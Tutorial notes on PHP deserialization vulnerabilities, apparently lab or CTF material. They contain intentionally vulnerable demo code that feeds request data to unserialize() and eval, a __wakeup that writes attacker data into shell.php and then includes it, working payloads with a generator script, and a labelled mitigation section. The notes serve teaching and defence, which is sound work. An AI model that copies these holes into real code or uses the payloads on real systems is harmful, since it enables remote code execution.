PHP serialization and unserialization
1. Basics of PHP serialization
1) PHP serialize and unserialize functions
2) PHP serialized string format
2. PHP magic methods
3. Vulnerability examples
1) Unserializing a string type
<?php
show_source(__FILE__);
$KEY = "test";
$str = $_GET['str'];
// Attacker-controlled input goes straight into unserialize(); a serialized "test" passes the check.
if (unserialize($str) === "$KEY")
{
    eval('phpinfo();');
}
else
    echo 'try it again';
?>
payload: ?str=s:4:"test"; # I am not sure whether the trailing ; has to be added; it seems to vary
Example on GitHub: https://github.com/poemThesky/poemThesky.github.io/blob/81e37af083d62444a41bac00d693d113b23f3640/%E8%AF%BE%E4%BB%B6%E7%9B%B8%E5%85%B3%E4%BE%8B%E9%A2%98/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AE%9E%E4%BE%8B1.php
2) Calling __wakeup
<?php
show_source(__FILE__);
class test{
    public $test;
    // Invoked automatically by unserialize(); writes the deserialized property to disk.
    function __wakeup(){
        $fp = fopen("shell.php","w") ;
        fwrite($fp,$this->test);
        fclose($fp);
    }
}
$class2 = $_GET['ser'];
print_r($class2);
echo "<br>";
$class2_unser = unserialize($class2);
@require "shell.php";
?>
Payload (URL-encoded): O%3A4%3A%22test%22%3A1%3A%7Bs%3A4%3A%22test%22%3Bs%3A15%3A%22%3C%3F+phpinfo%28%29%3B%3F%3E%22%3B%7D
One thing to note here: whether URL encoding is needed depends on the specific challenge; perhaps the browser version has an effect?
<?php
// Generates the URL-encoded payload shown above.
class test{
    public $test="<? phpinfo();?>";
    function __wakeup(){
        $fp = fopen("shell.php","w") ;
        fwrite($fp,$this->test);
        fclose($fp);
    }
}
$a = new test();
$b = serialize($a);
echo urlencode($b);
?>
GitHub address of example 2: https://github.com/poemThesky/poemThesky.github.io/blob/7b729b7c329a1e447850b37f21704bc07f747104/%E8%AF%BE%E4%BB%B6%E7%9B%B8%E5%85%B3%E4%BE%8B%E9%A2%98/php-unserialize-demo2.php
GitHub address of the payload script: https://github.com/poemThesky/poemThesky.github.io/blob/7b729b7c329a1e447850b37f21704bc07f747104/%E8%AF%BE%E4%BB%B6%E7%9B%B8%E5%85%B3%E4%BE%8B%E9%A2%98/php-unserialize-demo2-payload.php
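The following is an added example, not part of the original notes or the linked GitHub files. It prints the serialized forms that both payloads above rely on and shows the defence for the __wakeup case: the `allowed_classes` option of unserialize() (PHP 7.0+), which keeps untrusted input from instantiating `test` at all. The class name `test` and the value "harmless" are reused from the notes as placeholders.

```php
<?php
// Added example (not from the original notes). Requires PHP 7.0+ for the
// second argument to unserialize().

// 1) Scalar format is type:length:"value"; -- this is what ?str=s:4:"test"; is.
//    A serialized string compares === to the plain string once decoded.
var_dump(serialize("test"));
var_dump(unserialize('s:4:"test";') === "test");

// 2) Object format is O:<namelen>:"<class>":<nprops>:{<serialized props>}.
//    This is the shape of the __wakeup payload from example 2.
class test {
    public $test = "harmless";   // placeholder value, not a shell
    function __wakeup() {
        echo "__wakeup ran\n";
    }
}
$payload = serialize(new test());
echo $payload, "\n";

// 3) Plain unserialize() on attacker-controlled data builds a real test
//    object, so __wakeup() runs before the caller sees anything.
$obj = unserialize($payload);
var_dump($obj instanceof test);

// 4) Mitigation: refuse to instantiate classes. The object comes back as
//    __PHP_Incomplete_Class and no magic method of test is invoked. A whitelist
//    (['allowed_classes' => ['SomeDto']]) is the option when objects are needed.
$safe = unserialize($payload, ['allowed_classes' => false]);
var_dump($safe instanceof __PHP_Incomplete_Class);
var_dump($safe instanceof test);

// 5) When only data is exchanged, prefer JSON: json_decode() never
//    instantiates application classes, so there is no __wakeup to reach.
var_dump(json_decode('{"test":"harmless"}', true));
?>
```

Run with `php example.php`: step 3 prints "__wakeup ran", step 4 does not, which is the difference a defender wants to see before exposing unserialize() to request data.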